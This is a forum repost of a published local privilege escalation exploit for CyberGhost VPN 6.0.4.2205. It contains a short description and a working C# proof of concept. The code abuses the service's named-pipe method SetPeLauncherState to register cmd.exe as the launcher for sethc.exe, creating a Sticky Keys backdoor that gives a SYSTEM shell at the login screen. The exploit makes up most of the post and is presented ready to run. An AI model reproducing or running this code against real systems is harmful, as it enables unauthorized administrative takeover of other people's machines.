Jump to content
KhiZaRix

CyberGhost 6.0.4.2205 Privilege Escalation

Recommended Posts

Posted
# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
# Date: 06.03.2017
# Software Link: http://www.cyberghostvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
  
1. Description
 
`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

2. Proof of Concept

using System;
using CyberGhost.Communication;

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}

Sursa/Source: https://packetstormsecurity.com/files/141455/CyberGhost-6.0.4.2205-Privilege-Escalation.html

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...